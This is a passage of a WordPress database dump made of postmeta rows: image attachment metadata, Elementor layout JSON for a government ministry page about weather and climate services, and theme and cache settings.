\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20661,3020,'_wp_attached_file','2019/11/mot.jpg'),(20662,3020,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:197;s:6:\"height\";i:197;s:4:\"file\";s:15:\"2019/11/mot.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mot-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20663,1598,'_thumbnail_id','3215'),(20664,3021,'_elementor_edit_mode','builder'),(20665,3021,'_elementor_template_type','wp-post'),(20666,3021,'_elementor_version','2.7.5'),(20667,3021,'_wp_page_template','default'),(20668,3021,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20669,3021,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20671,3021,'_thumbnail_id','3020'),(20672,3022,'_wp_attached_file','2019/11/download-3.jpg'),(20673,3022,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:436;s:6:\"height\";i:116;s:4:\"file\";s:22:\"2019/11/download-3.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"download-3-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"download-3-150x116.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20674,3023,'_elementor_controls_usage','a:0:{}'),(20675,3023,'_thumbnail_id','3025'),(20676,3023,'ocean_gallery_link_images','off'),(20677,3023,'ocean_sidebar','0'),(20678,3023,'ocean_second_sidebar','0'),(20679,3023,'ocean_disable_margins','enable'),(20680,3023,'ocean_display_top_bar','default'),(20681,3023,'ocean_display_header','default'),(20682,3023,'ocean_center_header_left_menu','0'),(20683,3023,'ocean_custom_header_template','0'),(20684,3023,'ocean_header_custom_menu','0'),(20685,3023,'ocean_menu_typo_font_family','0'),(20686,3023,'ocean_disable_title','default'),(20687,3023,'ocean_disable_heading','default'),(20688,3023,'ocean_disable_breadcrumbs','default'),(20689,3023,'ocean_display_footer_widgets','default'),(20690,3023,'ocean_display_footer_bottom','default'),(20691,3023,'ocean_custom_footer_template','0'),(20692,3023,'ocean_link_format_target','self'),(20693,3023,'ocean_quote_format_link','post'),(20694,3023,'osh_disable_topbar_sticky','default'),(20695,3023,'osh_disable_header_sticky','default'),(20696,3023,'osh_sticky_header_style','default'),(20698,3023,'_dp_original','2956'),(20699,3023,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103666;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3045;}i:1;a:1:{s:2:\"id\";i:3313;}i:2;a:1:{s:2:\"id\";i:3486;}i:3;a:1:{s:2:\"id\";i:3316;}i:4;a:1:{s:2:\"id\";i:2801;}i:5;a:1:{s:2:\"id\";i:3731;}}}}'),(20700,3023,'_edit_lock','1583249501:38'),(20701,3024,'_wp_attached_file','2020/03/DED-e1583249391964.jpg'),(20702,3024,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:968;s:6:\"height\";i:748;s:4:\"file\";s:30:\"2020/03/DED-e1583249391964.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"DED-e1583249391964-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"DED-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"DED-e1583249391964-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"DED-e1583249391964-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20703,3024,'_wp_attachment_backup_sizes','a:5:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1061;s:6:\"height\";i:796;s:4:\"file\";s:7:\"DED.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:15:\"DED-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:15:\"DED-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:15:\"DED-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:16:\"DED-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(20704,3025,'_wp_attached_file','2020/03/DED-1.jpg'),(20705,3025,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1061;s:6:\"height\";i:796;s:4:\"file\";s:17:\"2020/03/DED-1.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"DED-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"DED-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"DED-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"DED-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20708,3023,'_edit_last','38'),(20711,3027,'_elementor_controls_usage','a:0:{}'),(20712,3027,'_thumbnail_id','3028'),(20713,3027,'ocean_gallery_link_images','off'),(20714,3027,'ocean_sidebar','0'),(20715,3027,'ocean_second_sidebar','0'),(20716,3027,'ocean_disable_margins','enable'),(20717,3027,'ocean_display_top_bar','default'),(20718,3027,'ocean_display_header','default'),(20719,3027,'ocean_center_header_left_menu','0'),(20720,3027,'ocean_custom_header_template','0'),(20721,3027,'ocean_header_custom_menu','0'),(20722,3027,'ocean_menu_typo_font_family','0'),(20723,3027,'ocean_disable_title','default'),(20724,3027,'ocean_disable_heading','default'),(20725,3027,'ocean_disable_breadcrumbs','default'),(20726,3027,'ocean_display_footer_widgets','default'),(20727,3027,'ocean_display_footer_bottom','default'),(20728,3027,'ocean_custom_footer_template','0'),(20729,3027,'ocean_link_format_target','self'),(20730,3027,'ocean_quote_format_link','post'),(20731,3027,'osh_disable_topbar_sticky','default'),(20732,3027,'osh_disable_header_sticky','default'),(20733,3027,'osh_sticky_header_style','default'),(20735,3027,'_dp_original','3023'),(20736,3027,'_jetpack_related_posts_cache','a:2:{s:32:\"2fe589b7262aa2e26fff214f491a68dd\";a:2:{s:7:\"expires\";i:1627948231;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3066;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3724;}}}s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627948262;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3066;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3724;}}}}'),(20737,3027,'_edit_lock','1583250447:38'),(20738,3028,'_wp_attached_file','2020/03/shutdown.jpg'),(20739,3028,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1091;s:6:\"height\";i:818;s:4:\"file\";s:20:\"2020/03/shutdown.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"shutdown-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"shutdown-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"shutdown-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"shutdown-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20742,3027,'_edit_last','38'),(20743,3030,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628942538;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3735;}i:1;a:1:{s:2:\"id\";i:3771;}i:2;a:1:{s:2:\"id\";i:3749;}i:3;a:1:{s:2:\"id\";i:3297;}i:4;a:1:{s:2:\"id\";i:3290;}i:5;a:1:{s:2:\"id\";i:2956;}}}}'),(20744,3030,'_edit_lock','1583252977:38'),(20745,3031,'_wp_attached_file','2020/03/lisgis-trains-mapping-agents.png'),(20746,3031,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:893;s:6:\"height\";i:561;s:4:\"file\";s:40:\"2020/03/lisgis-trains-mapping-agents.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"lisgis-trains-mapping-agents-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"lisgis-trains-mapping-agents-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"lisgis-trains-mapping-agents-768x482.png\";s:5:\"width\";i:768;s:6:\"height\";i:482;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20747,3030,'_elementor_controls_usage','a:0:{}'),(20750,3030,'_thumbnail_id','3031'),(20751,3030,'_edit_last','38'),(20752,3030,'ocean_gallery_link_images','off'),(20753,3030,'ocean_sidebar','0'),(20754,3030,'ocean_second_sidebar','0'),(20755,3030,'ocean_disable_margins','enable'),(20756,3030,'ocean_display_top_bar','default'),(20757,3030,'ocean_display_header','default'),(20758,3030,'ocean_center_header_left_menu','0'),(20759,3030,'ocean_custom_header_template','0'),(20760,3030,'ocean_header_custom_menu','0'),(20761,3030,'ocean_menu_typo_font_family','0'),(20762,3030,'ocean_disable_title','default'),(20763,3030,'ocean_disable_heading','default'),(20764,3030,'ocean_disable_breadcrumbs','default'),(20765,3030,'ocean_display_footer_widgets','default'),(20766,3030,'ocean_display_footer_bottom','default'),(20767,3030,'ocean_custom_footer_template','0'),(20768,3030,'ocean_link_format_target','self'),(20769,3030,'ocean_quote_format_link','post'),(20770,3030,'osh_disable_topbar_sticky','default'),(20771,3030,'osh_disable_header_sticky','default'),(20772,3030,'osh_sticky_header_style','default'),(20773,3033,'_wp_attached_file','2019/11/ci-facebook.jpg'),(20774,3033,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:23:\"2019/11/ci-facebook.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"ci-facebook-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"ci-facebook-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ci-facebook-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"ci-facebook-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"ci-facebook-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20775,3034,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628524736;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3489;}i:2;a:1:{s:2:\"id\";i:3063;}}}}'),(20776,3034,'_edit_lock','1583426827:38'),(20777,3035,'_wp_attached_file','2020/03/Ci-news.jpg'),(20778,3035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:576;s:4:\"file\";s:19:\"2020/03/Ci-news.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Ci-news-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Ci-news-1024x461.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Ci-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Ci-news-768x346.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20779,3034,'_elementor_controls_usage','a:0:{}'),(20782,3034,'_thumbnail_id','3035'),(20783,3034,'_edit_last','38'),(20784,3034,'ocean_gallery_link_images','off'),(20785,3034,'ocean_sidebar','0'),(20786,3034,'ocean_second_sidebar','0'),(20787,3034,'ocean_disable_margins','enable'),(20788,3034,'ocean_display_top_bar','default'),(20789,3034,'ocean_display_header','default'),(20790,3034,'ocean_center_header_left_menu','0'),(20791,3034,'ocean_custom_header_template','0'),(20792,3034,'ocean_header_custom_menu','0'),(20793,3034,'ocean_menu_typo_font_family','0'),(20794,3034,'ocean_disable_title','default'),(20795,3034,'ocean_disable_heading','default'),(20796,3034,'ocean_disable_breadcrumbs','default'),(20797,3034,'ocean_display_footer_widgets','default'),(20798,3034,'ocean_display_footer_bottom','default'),(20799,3034,'ocean_custom_footer_template','0'),(20800,3034,'ocean_link_format_target','self'),(20801,3034,'ocean_quote_format_link','post'),(20802,3034,'osh_disable_topbar_sticky','default'),(20803,3034,'osh_disable_header_sticky','default'),(20804,3034,'osh_sticky_header_style','default'),(20805,2178,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628934451;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:1718;}i:2;a:1:{s:2:\"id\";i:3096;}}}}'),(20806,3038,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103664;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3430;}i:1;a:1:{s:2:\"id\";i:2801;}i:2;a:1:{s:2:\"id\";i:3721;}i:3;a:1:{s:2:\"id\";i:3738;}i:4;a:1:{s:2:\"id\";i:2956;}i:5;a:1:{s:2:\"id\";i:3316;}}}}'),(20807,3038,'_edit_lock','1583433967:38'),(20808,3039,'_wp_attached_file','2020/03/EPA2.jpg'),(20809,3039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\